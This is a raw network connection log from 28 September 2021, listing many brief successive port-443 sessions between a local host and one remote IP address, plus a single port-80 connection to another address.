Sep 28, 2021 07:59:33.152688980 CEST	50044	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.152704954 CEST	443	50044	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.260325909 CEST	443	50044	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.260413885 CEST	443	50044	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.260493040 CEST	50044	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.261671066 CEST	50044	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.263662100 CEST	50045	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.263724089 CEST	443	50045	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.263875961 CEST	50045	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.264509916 CEST	50045	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.264533997 CEST	443	50045	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.337239981 CEST	443	50045	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.341985941 CEST	50045	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.342031002 CEST	443	50045	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.342276096 CEST	50045	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.342293024 CEST	443	50045	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.454571009 CEST	443	50045	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.454663992 CEST	443	50045	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.454826117 CEST	50045	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.455888987 CEST	50045	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.457827091 CEST	50046	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.457882881 CEST	443	50046	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.458951950 CEST	50046	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.459019899 CEST	50046	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.459038973 CEST	443	50046	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.521531105 CEST	443	50046	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.526055098 CEST	50046	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.526091099 CEST	443	50046	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.526442051 CEST	50046	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.526456118 CEST	443	50046	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.639576912 CEST	443	50046	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.640727997 CEST	443	50046	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.645710945 CEST	50047	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.645747900 CEST	50046	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.645768881 CEST	443	50047	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.645781040 CEST	50046	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.645966053 CEST	50047	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.646682978 CEST	50047	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.646711111 CEST	443	50047	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.719841957 CEST	443	50047	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.724117041 CEST	50047	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.724172115 CEST	443	50047	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.724329948 CEST	50047	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.724340916 CEST	443	50047	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.827055931 CEST	443	50047	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.827181101 CEST	443	50047	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.827315092 CEST	50047	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.828497887 CEST	50047	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.830414057 CEST	50048	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.830463886 CEST	443	50048	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.830661058 CEST	50048	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.831281900 CEST	50048	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.831305981 CEST	443	50048	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.911993027 CEST	443	50048	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.915612936 CEST	50048	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.915673971 CEST	443	50048	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:33.915776014 CEST	50048	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:33.915787935 CEST	443	50048	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.020457983 CEST	443	50048	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.020648956 CEST	443	50048	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.022370100 CEST	50048	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.023493052 CEST	50048	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.026779890 CEST	50049	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.026884079 CEST	443	50049	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.030736923 CEST	50049	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.030798912 CEST	50049	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.030812025 CEST	443	50049	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.094078064 CEST	443	50049	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.098445892 CEST	50049	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.098495007 CEST	443	50049	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.098645926 CEST	50049	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.098656893 CEST	443	50049	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.209059954 CEST	443	50049	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.209144115 CEST	443	50049	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.209223032 CEST	50049	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.210685015 CEST	50049	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.215897083 CEST	50050	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.215943098 CEST	443	50050	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.216109991 CEST	50050	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.218097925 CEST	50050	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.218116999 CEST	443	50050	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.277333021 CEST	443	50050	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.281851053 CEST	50050	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.281918049 CEST	443	50050	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.282071114 CEST	50050	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.282084942 CEST	443	50050	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.458101034 CEST	443	50050	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.458193064 CEST	443	50050	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.458343029 CEST	50050	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.459950924 CEST	50050	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.462300062 CEST	50051	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.462354898 CEST	443	50051	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.462549925 CEST	50051	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.463515997 CEST	50051	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.463542938 CEST	443	50051	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.523617029 CEST	443	50051	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.527801037 CEST	50051	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.527834892 CEST	443	50051	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.527987003 CEST	50051	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.528000116 CEST	443	50051	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.629019976 CEST	443	50051	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.629683971 CEST	443	50051	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.629875898 CEST	50051	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.630539894 CEST	50051	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.633536100 CEST	50052	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.633591890 CEST	443	50052	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.633711100 CEST	50052	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.635478973 CEST	50052	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.635518074 CEST	443	50052	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.696382999 CEST	443	50052	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.700504065 CEST	50052	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.700534105 CEST	443	50052	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.700650930 CEST	50052	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.700665951 CEST	443	50052	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.816198111 CEST	443	50052	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.816287041 CEST	443	50052	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.816407919 CEST	50052	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.817526102 CEST	50052	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.819828987 CEST	50053	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.819881916 CEST	443	50053	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.820046902 CEST	50053	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.820919991 CEST	50053	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.820946932 CEST	443	50053	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.881014109 CEST	443	50053	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.885027885 CEST	50053	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.885082960 CEST	443	50053	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:34.885215998 CEST	50053	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:34.885232925 CEST	443	50053	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.075290918 CEST	443	50053	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.075382948 CEST	443	50053	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.075540066 CEST	50053	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.076554060 CEST	50053	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.078514099 CEST	50054	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.078579903 CEST	443	50054	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.078722954 CEST	50054	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.079350948 CEST	50054	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.079396009 CEST	443	50054	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.137305021 CEST	443	50054	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.141773939 CEST	50054	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.141825914 CEST	443	50054	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.141961098 CEST	50054	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.141979933 CEST	443	50054	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.260082960 CEST	443	50054	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.260178089 CEST	443	50054	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.260251999 CEST	50054	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.263252974 CEST	50054	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.263958931 CEST	50055	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.264007092 CEST	443	50055	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.264146090 CEST	50055	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.264770985 CEST	50055	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.264791012 CEST	443	50055	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.321974993 CEST	443	50055	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.326584101 CEST	50055	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.326623917 CEST	443	50055	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.326729059 CEST	50055	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.326738119 CEST	443	50055	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.438276052 CEST	443	50055	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.439062119 CEST	443	50055	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.439316034 CEST	50055	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.440623045 CEST	50055	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.442121029 CEST	50056	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.442215919 CEST	443	50056	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.442468882 CEST	50056	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.443002939 CEST	50056	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.443022013 CEST	443	50056	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.509870052 CEST	443	50056	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.516251087 CEST	50056	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.516293049 CEST	443	50056	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.516524076 CEST	50056	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.516547918 CEST	443	50056	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.623016119 CEST	443	50056	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.623102903 CEST	443	50056	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.623212099 CEST	50056	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.624320030 CEST	50056	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.626187086 CEST	50057	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.626238108 CEST	443	50057	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.626354933 CEST	50057	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.627209902 CEST	50057	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.627233028 CEST	443	50057	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.691066980 CEST	443	50057	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.695065975 CEST	50057	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.695105076 CEST	443	50057	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.695184946 CEST	50057	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.695194960 CEST	443	50057	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.813754082 CEST	443	50057	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.813853979 CEST	443	50057	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.816864014 CEST	50057	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.817439079 CEST	50057	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.819039106 CEST	50058	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.819094896 CEST	443	50058	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.820765018 CEST	50058	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.820801020 CEST	50058	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.820810080 CEST	443	50058	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.883589029 CEST	443	50058	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.889012098 CEST	50058	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.889048100 CEST	443	50058	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:35.889163971 CEST	50058	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:35.889178038 CEST	443	50058	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.010334015 CEST	443	50058	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.010421038 CEST	443	50058	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.012079954 CEST	50058	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.012113094 CEST	50058	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.015691042 CEST	50059	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.015743971 CEST	443	50059	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.015863895 CEST	50059	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.016633034 CEST	50059	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.016658068 CEST	443	50059	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.090878010 CEST	443	50059	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.103068113 CEST	50059	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.103105068 CEST	443	50059	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.104382992 CEST	50059	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.104406118 CEST	443	50059	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.211762905 CEST	443	50059	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.215969086 CEST	443	50059	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.216079950 CEST	50059	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.216697931 CEST	50059	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.253864050 CEST	50060	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.253912926 CEST	443	50060	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.254012108 CEST	50060	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.254614115 CEST	50060	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.254626989 CEST	443	50060	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.367655039 CEST	443	50060	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.372438908 CEST	50060	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.372476101 CEST	443	50060	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.372745991 CEST	50060	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.372761965 CEST	443	50060	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.554102898 CEST	443	50060	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.555723906 CEST	443	50060	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.565336943 CEST	50060	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.568989992 CEST	50061	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.569036961 CEST	443	50061	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.569717884 CEST	50060	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.569839954 CEST	50061	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.576688051 CEST	50061	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.576720953 CEST	443	50061	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.655499935 CEST	443	50061	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.661441088 CEST	50061	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.661483049 CEST	443	50061	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.662780046 CEST	50061	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.662791967 CEST	443	50061	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.942148924 CEST	443	50061	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.942246914 CEST	443	50061	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.942348957 CEST	50061	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.943136930 CEST	50061	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.944700003 CEST	50062	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.944736958 CEST	443	50062	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:36.944824934 CEST	50062	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.945301056 CEST	50062	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:36.945318937 CEST	443	50062	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.004107952 CEST	443	50062	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.007455111 CEST	50062	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.007474899 CEST	443	50062	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.007575035 CEST	50062	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.007584095 CEST	443	50062	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.119880915 CEST	443	50062	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.119956970 CEST	443	50062	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.120019913 CEST	50062	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.120788097 CEST	50062	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.122189999 CEST	50063	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.122234106 CEST	443	50063	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.122339964 CEST	50063	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.122729063 CEST	50063	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.122752905 CEST	443	50063	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.180241108 CEST	443	50063	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.182915926 CEST	50063	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.182950974 CEST	443	50063	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.183033943 CEST	50063	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.183043957 CEST	443	50063	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.292745113 CEST	443	50063	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.292819023 CEST	443	50063	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.292915106 CEST	50063	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.293595076 CEST	50063	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.295188904 CEST	50065	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.295238018 CEST	443	50065	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.295325994 CEST	50065	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.295977116 CEST	50065	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.296004057 CEST	443	50065	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.353686094 CEST	443	50065	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.356508017 CEST	50065	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.356540918 CEST	443	50065	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.356632948 CEST	50065	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.356648922 CEST	443	50065	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.444772959 CEST	443	50065	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.444848061 CEST	443	50065	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.444911003 CEST	50065	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.445619106 CEST	50065	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.446866989 CEST	50066	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.446898937 CEST	443	50066	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.446996927 CEST	50066	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.447393894 CEST	50066	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.447407961 CEST	443	50066	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.504151106 CEST	443	50066	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.506828070 CEST	50066	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.506860971 CEST	443	50066	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.506973028 CEST	50066	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.506985903 CEST	443	50066	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.669791937 CEST	443	50066	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.669867992 CEST	443	50066	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.669945955 CEST	50066	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.670790911 CEST	50066	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.672106028 CEST	50067	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.672157049 CEST	443	50067	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.672240019 CEST	50067	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.672658920 CEST	50067	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.672672033 CEST	443	50067	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.728734970 CEST	443	50067	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.731189966 CEST	50067	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.731239080 CEST	443	50067	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.731311083 CEST	50067	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.731321096 CEST	443	50067	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.855197906 CEST	443	50067	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.855284929 CEST	443	50067	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.855343103 CEST	50067	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.856311083 CEST	50067	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.857975960 CEST	50068	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.858014107 CEST	443	50068	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.858081102 CEST	50068	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.858448982 CEST	50068	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.858459949 CEST	443	50068	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.916346073 CEST	443	50068	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.919038057 CEST	50068	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.919055939 CEST	443	50068	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:37.919276953 CEST	50068	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:37.919284105 CEST	443	50068	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.008375883 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 28, 2021 07:59:38.034142017 CEST	443	50068	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.034225941 CEST	443	50068	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.034311056 CEST	50068	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.035037994 CEST	50068	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.037015915 CEST	50070	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.037049055 CEST	443	50070	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:38.037137032 CEST	50070	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:38.037513018 CEST	50070	443	192.168.2.4	149.154.167.220
